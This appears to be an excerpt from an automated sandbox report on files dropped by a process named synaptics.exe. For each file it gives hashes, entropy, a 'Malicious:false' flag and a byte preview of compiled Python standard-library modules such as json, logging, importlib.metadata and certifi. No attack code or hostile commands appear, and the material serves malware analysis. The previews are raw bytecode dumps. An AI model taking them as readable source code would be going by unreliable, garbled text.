                                                                                                                                                                                                                Preview:o........{-d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2354
                                                                                                                                                                                                                Entropy (8bit):5.145329664194524
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:8uvHOKj0XocKHdq5UHdUktPdSNwplt9SDYvloUTG:zHOKiocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                                                MD5:56726666BC1A091F87F1E812027ADFD6
                                                                                                                                                                                                                SHA1:53284AE9AA1621CC5973407D786631471464099F
                                                                                                                                                                                                                SHA-256:256106BF113F417E80C3B823C2902A6EE6888908CEA3E3A959F0BDF45888BCF1
                                                                                                                                                                                                                SHA-512:BD777F63D812F5A734DD94EDEF326B7618FF0B46819A7D17690148AC29E5758AC9BD56180C9E894316EE4903C74D48B6BCA419104892694CA360D8FB93527759
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...=C:\Users\user\Desktop\tmp\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...D...}.|.j.r.|.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1529
                                                                                                                                                                                                                Entropy (8bit):4.998146887035629
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:nBf0kCRklLM8ZOSIJOmhgP3uSb7TVMPt/fkWB16RB6lghkChedco/qq6Ddqrqqp:nBf0Xkl4KOSI4mh6pTqdcWB1cegfhe+y
                                                                                                                                                                                                                MD5:5C9347B5006304ABDBAF8EB3E4084C02
                                                                                                                                                                                                                SHA1:1990E95CCFE324C5FBE6D9287A48A7911018D565
                                                                                                                                                                                                                SHA-256:402D54065E36FB5BBBA87543EB059AD5C1D1E385E4DB95759777530796F7C779
                                                                                                                                                                                                                SHA-512:390A7498E629C9B12FD946AA06307999A58FD43A150BB539846317D2145F27F1D6EBFC9D97169C2488B7E4E37B21C2F0D53AB349850954DAEA6E094F3DF3DC41
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...@C:\Users\user\Desktop\tmp\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.FreezableDefault
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3119
                                                                                                                                                                                                                Entropy (8bit):5.0848622480733585
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:nHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/yC:+oOCDUX4sXwjvMXNpa5p1qoOIk
                                                                                                                                                                                                                MD5:DDD0BFD11C943FF71F34E206BDE3163D
                                                                                                                                                                                                                SHA1:E19780D26EC3DD0631113E7C424139C1D2277E5D
                                                                                                                                                                                                                SHA-256:213090FCD6A08CDE99677850D3AC49FFE624E451286BE26B9ECF11A04B56B03D
                                                                                                                                                                                                                SHA-512:C37F1B84AF66DC7B8564FEEC38FEE14828F9650194728F4D4146E3B89AC541E893FC1BE7E7D71792A363BE289429F51DCE129DF97B5F245A03E584AE8046E728
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):581
                                                                                                                                                                                                                Entropy (8bit):5.105527166724522
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:C3l0//48ZPUbmR6OHRgD4gvwfJLV0jyr4euDsoVzoufN++k+Zqq18:0WDPUe6+k4fJgyE9gODlfnZqq18
                                                                                                                                                                                                                MD5:8F3AA89007D682EB8B5E51E70635976D
                                                                                                                                                                                                                SHA1:6BE5902CA164D3CC79E9E3CB31B3AE93825338BD
                                                                                                                                                                                                                SHA-256:6EF77F7CF13F6484B4F745003C61F7D81CABB3058C1C0388E17DB4E8EB965AD6
                                                                                                                                                                                                                SHA-512:C1360F5BD9D758C03D82587205B2909A7964D3A25EA737BD281D3E441945856932954B2F23B1490DF7B2D70FBFE5AA08E15D89CA9A180E76D543E3546D38FFA0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....>C:\Users\user\Desktop\tmp\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2274
                                                                                                                                                                                                                Entropy (8bit):4.708508640325835
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:6gnzBuSda0qUuJpYwj1JEZNmsZBCdHEjX9vlq:6gNuaa0qUAp/j1JErm8BCdHED90
                                                                                                                                                                                                                MD5:4FC6971B9F592B4A2AB729A1A835C81B
                                                                                                                                                                                                                SHA1:E0E0829676E1DC81B7640C1AA5FE8DCB716DBBEC
                                                                                                                                                                                                                SHA-256:50D630350EDD427D7436CD5CEA27A3F816F00AAD59DE1186565101006517E970
                                                                                                                                                                                                                SHA-512:F80791DAC0AB76097022BE274E5E964EF4B7CDA587F20D2E05ADB79E6BD52FEC90BDAEB36E2923651533D45BE606CF209503425A41377932204727DB4153DC88
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....9C:\Users\user\Desktop\tmp\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Return all values a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3070
                                                                                                                                                                                                                Entropy (8bit):5.047429868056239
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:CRhiYmIWTDvbG12wYRzHiUyOrIuxeQc2zGV4Kr8iOqLigqyiFqYbvHqMHXNVwQqg:8hFXWTrbGowYRzHinOrIAeQc2u4KrvOD
                                                                                                                                                                                                                MD5:8B77C34330879D557C001FD1C4BBDEBF
                                                                                                                                                                                                                SHA1:592B4BAEEBDF3B78108B7059E86711591119473D
                                                                                                                                                                                                                SHA-256:E78AA05E9688D09707877F27B86336390750A6D892D2DDE32E452B669F2DDA40
                                                                                                                                                                                                                SHA-512:2FBBD6E9B2E6C5358C04F5C1B2D3BB38063288AC724C17DED759FD75A0DC6BD7401A9C63370A90890AC8AEE653F35A6DF221061D98D5C31B54B5B21E96470592
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12274
                                                                                                                                                                                                                Entropy (8bit):5.3813126552682675
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:0M0k25NKigD6B7+vx1GkRGqb9j4ntKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:0M0TNKigBvx99j4t3vxx47OZrXZrb/
                                                                                                                                                                                                                MD5:7A55604BCD42ED8F9B2ACADBEED849F4
                                                                                                                                                                                                                SHA1:8A90B6011FFB6BE6C185394472011C0CC1AF739E
                                                                                                                                                                                                                SHA-256:38F763227D6550BF2790AE50B002376995C0145D91CB06F7E7CE00915101FE92
                                                                                                                                                                                                                SHA-512:9858200C9C6AF7563806C1FEE2167D752C4059CA9C71A5D6160EC3984799F678600B8F6964CA939A62B9C7803A10BADEBDCDBAFD4B8D2212E987EA1CD8AA9A5B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9776
                                                                                                                                                                                                                Entropy (8bit):5.561507041785419
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:OEe7HwdynOu7lf2/T40TuJLStugwlF8mbANHFThJt7AeI8I9iyrl:xsHwdyNV2/DTcOtw8muI9EyB
                                                                                                                                                                                                                MD5:BDC89D0BE31820EBC3BF88D97023D4D8
                                                                                                                                                                                                                SHA1:E4E026F341AB72E90490EB061F944977BB407453
                                                                                                                                                                                                                SHA-256:A72E91F1397535949D262EC9F0F4ABEF4AC4673484BFD52F2289DDDC130E5FEA
                                                                                                                                                                                                                SHA-512:9B7EDB17602FCE66F6300697C7519CC82254FA468228A1D3B8E58C5F1A9428DB77EFA768BB7FAAD57AA6129980F81664D908BBA2C514C539A1FE3F4B26F4C2FF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11127
                                                                                                                                                                                                                Entropy (8bit):5.493609123589281
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:0pqBSTkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:pEDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                                                MD5:746C03A8BC2514C095FAC779E117C529
                                                                                                                                                                                                                SHA1:2BE280A22E97A06795DB2337DD059BF364D67C6F
                                                                                                                                                                                                                SHA-256:F37348D0CD0EFCB8146DDCEA1DF32FB25DA9224C6D9EE37FBE5B908EB78C6FF1
                                                                                                                                                                                                                SHA-512:9CFE720B05DE66F69479D234CE64A7E9F4F6A7BC0424BA64878F0F4382270C775458F88B640FFE4740C28EA468914D9D45F33F0B6E132A3C9999B4AA5A8BC157
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r.....-C:\Users\user\Desktop\tmp\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c...................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1926
                                                                                                                                                                                                                Entropy (8bit):5.587151504714584
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Awhn/cfelN3xf9oIIv3y1R0vSFk9dVTdOIC54vD:X0MFLIPwGXTd9CeD
                                                                                                                                                                                                                MD5:E12E6662D459374E9648A607F406B5BA
                                                                                                                                                                                                                SHA1:D1D643051C08A50A0708D504325487D3B7661062
                                                                                                                                                                                                                SHA-256:6278B45BFD86C7D10DA9EF20FDC557A7DB67643FEE81B1F21E035CE09DFCD5DF
                                                                                                                                                                                                                SHA-512:591A99A0ECBEEB1E834B4176F8115DC80F5864B578AE527D6F6DC780A9DCFD5FAECB394F45B5ADC8BA1B27FD41859BF89746A2A409E0AC0ED7C3A010425BBA3B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):66901
                                                                                                                                                                                                                Entropy (8bit):5.22717122798343
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:NdNUR9zPwqY+L88QliC9Xxa2F3rnM4mpcQS1w+xtZUuJpw2bEOrQ0aWsV:NdyXme88Qli8X82JrMFcT/yN1V
                                                                                                                                                                                                                MD5:5EE336C512DD7EA610205F9D3B92F6FA
                                                                                                                                                                                                                SHA1:5F81FD798E4B6AB863E47B58BC7F63E7C1286BCC
                                                                                                                                                                                                                SHA-256:22653F9E8D991E773B17A4D2E190A122C7B5E30411DC275142ACC5EB4DBE1008
                                                                                                                                                                                                                SHA-512:0CFE238AA4438625CD3ACE8E50149FA9227BD57202DB59F0BCB4E9991DEBB01457F76BD3434E9D99854E198A94DDCBFDB46DAB3E88637F4F3B3561763A1810C0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7562
                                                                                                                                                                                                                Entropy (8bit):5.071585090712447
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:FpcgPE5vmnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkB:Vyvmnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                                MD5:E4ED11A273505488BB539188891E2CF7
                                                                                                                                                                                                                SHA1:25416A0D2841AEE58B5383F8F1E4C53A7D70B1D0
                                                                                                                                                                                                                SHA-256:512D486D79533C6E18961020AEF04A22B0D7BFF22EA80970B6AAB7FFE8CD52E8
                                                                                                                                                                                                                SHA-512:04223EA98073995795B55A3FD7D2847B991343D82C49C4A0F34BBF826B3ABBE97967479AE00E2EEFB3EC3ADAD1F4B3A3862CB67D8D87799894605AF0F3EF9E5E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........ .f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....GC:\Users\user\Desktop\tmp\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d.d.l.}.|...d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):269
                                                                                                                                                                                                                Entropy (8bit):4.98126776272356
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/meNbsZvEG/Xg6nCbWjN2o9ZAuGuFM9Arsq4G:CmeNQeGVN2o9+0qq7
                                                                                                                                                                                                                MD5:F187A07BBB083AA3C70EC08A04C2DCD7
                                                                                                                                                                                                                SHA1:8A8DC32A68A0268EF6BF63697FCC1C10ACB3E7D0
                                                                                                                                                                                                                SHA-256:5C94177375943807FDE077AA166688099449CA428A84377F64AA2580A6D682B0
                                                                                                                                                                                                                SHA-512:2217503A5EAC6618AD33A61404767E9DF38345449C5BBD34DF78C356A58B9530241231ED28911747660436FDDA76246E05B87D876E616884D6177B9DFCEB63D4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....?C:\Users\user\Desktop\tmp\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2100
                                                                                                                                                                                                                Entropy (8bit):4.924868669405933
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:TBUoxmgDZLaUAl/g95K3Q8+epPUHq7J8nH:NUC/lcg955epA1H
                                                                                                                                                                                                                MD5:5C6EF0BF6C7342AA12C6F39EEB1BE249
                                                                                                                                                                                                                SHA1:9E770A4A843417827A4988AB74DD235D75141364
                                                                                                                                                                                                                SHA-256:84D732BCB8681BD1028042FCF3AB63323BC1C5F35F2978E455EBB1736108837E
                                                                                                                                                                                                                SHA-512:48031F2B3F71734A30FADACC941E596E64108F5EE5899592C3269DD71649583A0E347FCCD3DFB7D05BAE7517F126B37D2B6EF502AABDFA5E11AFC51F419AC64E
                                                                                                                                                                                                                Malicious:false
